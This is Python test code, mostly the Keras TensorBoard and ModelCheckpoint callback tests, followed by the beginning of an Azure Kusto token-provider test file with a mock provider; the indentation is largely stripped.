Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains a summary of an unexpected kind.
"""
result = _SummaryFile()
for (dirpath, _, filenames) in os.walk(logdir):
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in tf.compat.v1.train.summary_iterator(path):
if event.graph_def:
result.graph_defs.append(event.graph_def)
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
elif kind == 'tensor' and tag != 'keras':
# Convert the tf2 summary proto to old style for type checking.
plugin_name = value.metadata.plugin_data.plugin_name
container = {
'images': result.images,
'histograms': result.histograms,
'scalars': result.scalars,
}.get(plugin_name)
if container is not None:
result.convert_from_v2_summary_proto = True
else:
container = result.tensors
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self, compile_model=True):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
if compile_model:
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=validation_dir, tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
})
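# Illustrative sketch (not part of the test above): a typical `TensorBoard`
# configuration covering the knobs exercised in this class. The log directory
# is an assumption for this sketch, and a compiled `model` with data is
# assumed as well.
def _tensorboard_usage_sketch(model, x, y, log_dir='/tmp/tb'):
  from tensorflow import keras
  tb = keras.callbacks.TensorBoard(
      log_dir=log_dir,
      histogram_freq=1,     # weight histograms every epoch
      write_graph=True,     # emit the Keras model graph
      write_images=False,
      update_freq='epoch',  # or an integer number of batches
      profile_batch=0)      # disable the profiler
  model.fit(x, y, validation_split=0.2, epochs=2, callbacks=[tb], verbose=0)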
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
})
def test_TensorBoard_no_spurious_event_files(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[tb_cbk])
events_file_run_basenames = set()
for (dirpath, _, filenames) in os.walk(self.train_dir):
if any(fn.startswith('events.out.') for fn in filenames):
events_file_run_basenames.add(os.path.basename(dirpath))
self.assertEqual(events_file_run_basenames, {'train'})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
def test_TensorBoard_learning_rate_schedules(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
callbacks=[keras.callbacks.TensorBoard(self.logdir)])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
},
)
def test_TensorBoard_global_step(self):
model = self._get_model(compile_model=False)
opt = gradient_descent.SGD(learning_rate_schedule.CosineDecay(0.01, 1))
model.compile(opt, 'mse', run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
model.fit(
x,
y,
batch_size=2,
epochs=2,
verbose=0,
callbacks=[
keras.callbacks.TensorBoard(
self.logdir,
update_freq=1,
profile_batch=0,
write_steps_per_second=True)
])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_learning_rate'),
_ObservedSummary(
logdir=self.train_dir, tag='epoch_steps_per_second'),
_ObservedSummary(
logdir=self.train_dir, tag='batch_steps_per_second'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model_type = testing_utils.get_model_type()
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms, model_type),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
if summary_file.convert_from_v2_summary_proto:
expected = {
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
}
else:
expected = {
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
}
self.assertEqual(
self._strip_layer_names(summary_file.images, model_type),
expected
)
def test_TensorBoard_projector_callback(self):
layers = [
keras.layers.Embedding(10, 10, name='test_embedding'),
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
optimizer='adam',
loss=keras.losses.BinaryCrossentropy(from_logits=True),
run_eagerly=testing_utils.should_run_eagerly())
x, y = np.ones((10, 10)), np.ones((10, 10))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir,
embeddings_freq=1,
embeddings_metadata={'test_embedding': 'metadata.tsv'})
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
with open(os.path.join(self.logdir, 'projector_config.pbtxt')) as f:
self.assertEqual(f.readlines(), [
'embeddings {\n',
(' tensor_name: '
'"layer_with_weights-0/embeddings/.ATTRIBUTES/VARIABLE_VALUE"\n'),
' metadata_path: "metadata.tsv"\n', '}\n'
])
def test_custom_summary(self):
if not tf.executing_eagerly():
self.skipTest('Custom summaries only supported in V2 code path.')
def scalar_v2_mock(name, data, step=None):
"""A reimplementation of the scalar plugin to avoid circular deps."""
metadata = tf.compat.v1.SummaryMetadata()
# Should match value in tensorboard/plugins/scalar/metadata.py.
metadata.plugin_data.plugin_name = 'scalars'
with tf.summary.experimental.summary_scope(
name, 'scalar_summary', values=[data, step]) as (tag, _):
return tf.summary.write(
tag=tag,
tensor=tf.cast(data, 'float32'),
step=step,
metadata=metadata)
class LayerWithSummary(keras.layers.Layer):
def call(self, x):
scalar_v2_mock('custom_summary', tf.reduce_sum(x))
return x
model = testing_utils.get_model_from_layers([LayerWithSummary()],
input_shape=(5,),
name='model')
model.compile(
'sgd',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
x, y = np.ones((10, 5)), np.ones((10, 5))
model.fit(x, y, batch_size=2, validation_data=(x, y), callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
_ObservedSummary(
logdir=self.validation_dir,
tag='evaluation_loss_vs_iterations'),
_ObservedSummary(
logdir=self.train_dir,
tag='model/layer_with_summary/custom_summary'),
_ObservedSummary(
logdir=self.validation_dir,
tag='model/layer_with_summary/custom_summary')
},
)
def _strip_layer_names(self, summaries, model_type):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
model_type: The model type currently being tested.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
start_from = 2 if 'subclass' in model_type else 1
new_tag = '/'.join(summary.tag.split('/')[start_from:])
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegex(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
def test_TensorBoard_non_blocking(self):
model = keras.Sequential([keras.layers.Dense(1)])
tb = keras.callbacks.TensorBoard(self.logdir)
self.assertTrue(tb._supports_tf_logs)
cb_list = keras.callbacks.CallbackList([tb],
model=model,
epochs=1,
steps=100,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, TensorBoard is causing a blocking '
'NumPy conversion.')
with tf.compat.v1.test.mock.patch.object(tensor, 'numpy', mock_numpy):
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(logs)
cb_list.on_predict_batch_end(logs)
cb_list.on_predict_end(logs)
# Note that this test specifies model_type explicitly.
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2NonParameterizedTest(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2NonParameterizedTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_seq_model(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
opt = gradient_descent.SGD(learning_rate=0.001)
model.compile(
opt,
'mse',
run_eagerly=testing_utils.should_run_eagerly())
return model
def _count_trace_file(self, logdir):
profile_dir = os.path.join(logdir, 'plugins', 'profile')
count = 0
for (dirpath, dirnames, filenames) in os.walk(profile_dir):
del dirpath # unused
del dirnames # unused
for filename in filenames:
if filename.endswith('.trace.json.gz'):
count += 1
return count
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir,
write_graph=True,
profile_batch=0)
model.fit(
x,
y,
batch_size=2,
epochs=3,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
if not model.run_eagerly:
# There should be one train graph
self.assertLen(summary_file.graph_defs, 1)
for graph_def in summary_file.graph_defs:
graph_def_str = str(graph_def)
# All the model layers should appear in the graphs
for layer in model.layers:
if 'input' not in layer.name:
self.assertIn(layer.name, graph_def_str)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_autoTrace(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_outerProfiler(self):
"""Runs a profiler session that interferes with the one from the callback.
    The callback will not generate a profile, but execution will proceed without
    crashing due to unhandled exceptions.
"""
tf.profiler.experimental.start(logdir='')
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=1, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
tf.profiler.experimental.stop(save=False)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_1'),
},
)
self.assertEqual(0, self._count_trace_file(logdir=self.train_dir))
def test_TensorBoard_autoTrace_tagNameWithBatchNum(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=2, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileBatchRangeSingle(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='2,2', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_2'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileBatchRangeTwice(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='10,10', write_graph=False)
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
time.sleep(1) # Avoids the second profile over-writing the first.
model.fit(
x,
y,
batch_size=3,
epochs=10,
validation_data=(x, y),
callbacks=[tb_cbk])
self.assertEqual(2, self._count_trace_file(logdir=self.logdir))
# Test case that replicates a Github issue.
# https://github.com/tensorflow/tensorflow/issues/37543
def test_TensorBoard_autoTrace_profileTwiceGraphMode(self):
tf.compat.v1.disable_eager_execution()
inp = keras.Input((1,))
out = keras.layers.Dense(units=1)(inp)
model = keras.Model(inp, out)
model.compile(gradient_descent.SGD(1), 'mse')
logdir = os.path.join(self.get_temp_dir(), 'tb1')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=1)],
)
# Verifies trace exists in the first logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
logdir = os.path.join(self.get_temp_dir(), 'tb2')
model.fit(
np.zeros((64, 1)),
np.zeros((64, 1)),
batch_size=32,
callbacks=[keras.callbacks.TensorBoard(logdir, profile_batch=2)],
)
# Verifies trace exists in the second logdir.
self.assertEqual(1, self._count_trace_file(logdir=logdir))
def test_TensorBoard_autoTrace_profileBatchRange(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='1,3', write_graph=False)
model.fit(
x,
y,
batch_size=4,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
# Trace will be logged once at the batch it stops profiling.
_ObservedSummary(logdir=self.train_dir, tag=u'batch_3'),
},
)
self.assertEqual(1, self._count_trace_file(logdir=self.logdir))
def test_TensorBoard_autoTrace_profileInvalidBatchRange(self):
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='-1,3',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir,
histogram_freq=1,
profile_batch='1,None',
write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch='6,5', write_graph=False)
with self.assertRaises(ValueError):
keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=-1, write_graph=False)
def test_TensorBoard_autoTrace_profile_batch_largerThanBatchCount(self):
model = self._get_seq_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, profile_batch=10000, write_graph=False)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
# Enabled trace only on the 10000th batch, thus it should be empty.
self.assertEmpty(summary_file.tensors)
self.assertEqual(0, self._count_trace_file(logdir=self.train_dir))
class MostRecentlyModifiedFileMatchingPatternTest(tf.test.TestCase):
def test_get_most_recently_modified_file_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.batch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
        # Ensure there is some interval between file creations.
time.sleep(2)
f.write('foo bar')
# Ensure the files have been actually written.
self.assertEqual(
set([
os.path.join(test_dir, file_name)
for file_name in os.listdir(test_dir)
]), set(file_paths))
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-1])
def test_some_file_not_matching_pattern(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}.h5'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
file_paths = [
os.path.join(test_dir, file_name) for file_name in
['f.batch03epoch02.h5', 'f.batch02epoch02.h5', 'f.baatch01epoch01.h5']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
        # Ensure there is some interval between file creations.
time.sleep(2)
f.write('foo bar')
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
file_paths[-2])
def test_get_same_file_if_file_name_equals_pattern(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
with open(file_path, 'w') as f:
f.write('foo bar')
self.assertEqual(os.path.join(test_dir, os.listdir(test_dir)[0]), file_path)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
file_path)
def test_get_none_if_file_does_not_exist(self):
file_name = 'f.batch02.h5'
test_dir = self.get_temp_dir()
file_path = os.path.join(test_dir, file_name)
self.assertLen(os.listdir(test_dir), 0)
self.assertEqual(
keras.callbacks.ModelCheckpoint(
None)._get_most_recently_modified_file_matching_pattern(file_path),
None)
def test_using_checkpoint_management_latest_checkpoint(self):
file_pattern = 'f.batch{batch:02d}epoch{epoch:02d}'
ckpt_file_name = 'f.batchXepochY'
test_dir = self.get_temp_dir()
path_pattern = os.path.join(test_dir, file_pattern)
ckpt_file_path = os.path.join(test_dir, ckpt_file_name)
with open(ckpt_file_path, 'w') as f:
f.write('dummy ckpt')
tf.__internal__.train.update_checkpoint_state(
test_dir, ckpt_file_path)
file_paths = [
os.path.join(test_dir, file_name)
for file_name in ['f.batch03epoch02', 'f.batch02epoch02']
]
for file_path in file_paths:
with open(file_path, 'w') as f:
f.write('foo bar')
# The result returned from checkpoint_management.latest_checkpoint takes
# priority, so even if it was written earlier, we should still return that.
self.assertEqual(
keras.callbacks.ModelCheckpoint(None)
._get_most_recently_modified_file_matching_pattern(path_pattern),
ckpt_file_path)
class SummaryOpsTest(tf.test.TestCase):
def tearDown(self):
super(SummaryOpsTest, self).tearDown()
tf.summary.trace_off()
def keras_model(self, *args, **kwargs):
logdir = self.get_temp_dir()
writer = tf.summary.create_file_writer(logdir)
with writer.as_default():
keras.callbacks.keras_model_summary(*args, **kwargs)
writer.close()
events = events_from_logdir(logdir)
# The first event contains no summary values. The written content goes to
# the second event.
return events[1]
@testing_utils.run_v2_only
def testKerasModel(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
event = self.keras_model(name='my_name', data=model, step=1)
first_val = event.summary.value[0]
self.assertEqual(model.to_json(), first_val.tensor.string_val[0].decode())
@testing_utils.run_v2_only
def testKerasModel_usesDefaultStep(self):
model = keras.Sequential(
[Dense(10, input_shape=(100,)),
Activation('relu', name='my_relu')])
try:
tf.summary.experimental.set_step(42)
event = self.keras_model(name='my_name', data=model)
self.assertEqual(42, event.step)
finally:
# Reset to default state for other tests.
tf.summary.experimental.set_step(None)
@testing_utils.run_v2_only
def testKerasModel_subclass(self):
class SimpleSubclass(keras.Model):
def __init__(self):
super(SimpleSubclass, self).__init__(name='subclass')
self.dense = Dense(10, input_shape=(100,))
self.activation = Activation('relu', name='my_relu')
def call(self, inputs):
x = self.dense(inputs)
return self.activation(x)
model = SimpleSubclass()
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args), 'Model failed to serialize as JSON.')
@testing_utils.run_v2_only
def testKerasModel_otherExceptions(self):
model = keras.Sequential()
with tf.compat.v1.test.mock.patch.object(model, 'to_json') as mock_to_json:
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
mock_to_json.side_effect = Exception('oops')
self.assertFalse(
keras.callbacks.keras_model_summary(
name='my_name', data=model, step=1))
self.assertRegex(
str(mock_log.call_args),
'Model failed to serialize as JSON. Ignoring')
def events_from_file(filepath):
"""Returns all events in a single event file.
Args:
filepath: Path to the event file.
Returns:
    A list of tf.Event protos parsed from the event file.
"""
result = []
raw_dataset = tf.data.TFRecordDataset([filepath])
for raw_record in raw_dataset.take(10):
event = tf.compat.v1.Event()
event.ParseFromString(raw_record.numpy())
result.append(event)
return result
def events_from_logdir(logdir):
"""Returns all events in the single eventfile in logdir.
Args:
logdir: The directory in which the single event file is sought.
Returns:
A list of all tf.Event protos from the single event file.
Raises:
AssertionError: If logdir does not contain exactly one file.
"""
assert tf.compat.v1.gfile.Exists(logdir)
files = tf.compat.v1.gfile.ListDirectory(logdir)
  assert len(files) == 1, 'Expected exactly one file in logdir, found: %s' % files
return events_from_file(os.path.join(logdir, files[0]))
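# Illustrative usage sketch (hypothetical `logdir`; not itself part of the test suite): once a
# summary writer has flushed a single event file into `logdir`, the helpers above can be used as
#   events = events_from_logdir(logdir)
#   events[0]    # typically the header event with no summary values (see keras_model above)
#   events[1:]   # events carrying the written summaries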
if __name__ == '__main__':
tf.test.main()
|
test_token_providers.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License
import os
import unittest
from threading import Thread
from asgiref.sync import async_to_sync
from azure.kusto.data._cloud_settings import CloudInfo
from azure.kusto.data._token_providers import *
KUSTO_URI = "https://sdkse2etest.eastus.kusto.windows.net"
TOKEN_VALUE = "little miss sunshine"
TEST_AZ_AUTH = False # enable this in environments with az cli installed, and make sure to call 'az login' first
TEST_MSI_AUTH = False # enable this in environments with MSI enabled and make sure to set the relevant environment variables
TEST_DEVICE_AUTH = False # User interaction required, enable this when running test manually
TEST_INTERACTIVE_AUTH = False # User interaction required, enable this when running test manually
class MockProvider(TokenProviderBase):
def __init__(self, is_async: bool = False):
super().__init__(is_async)
self._silent_token = False
self.init_count = 0
@staticmethod
def name() -> str:
return "MockProvider"
def _context_impl(self) -> dict:
return {"authority": "MockProvider"}
def _init_impl(self):
self.init_count = self.init_count + 1
def _get_token_impl(self) -> Optional[dict]:
self._silent_token = True
return {TokenConstants.MSAL_ACCESS_TOKEN: "token"}
def _get_token_from_cache_impl(self) -> Optional[dict]:
if self._silent_token:
return {TokenConstants.MSAL_ACCESS_TOKEN: "token"}
return None
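# Descriptive note: MockProvider illustrates the provider contract exercised by
# test_base_provider below. The first get_token() call runs _init_impl() and _get_token_impl();
# afterwards _get_token_from_cache_impl() can serve the cached token, so init_count stays at 1.
# The concrete call order lives in TokenProviderBase, not in this mock.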
class TokenProviderTests(unittest.TestCase):
@staticmethod
def test_base_provider():
# test init with no URI
provider = MockProvider()
# Test provider with URI, No silent token
provider = MockProvider()
token = provider._get_token_from_cache_impl()
assert provider.init_count == 0
assert token is None
token = provider.get_token()
assert provider.init_count == 1
assert TokenConstants.MSAL_ACCESS_TOKEN in token
token = provider._get_token_from_cache_impl()
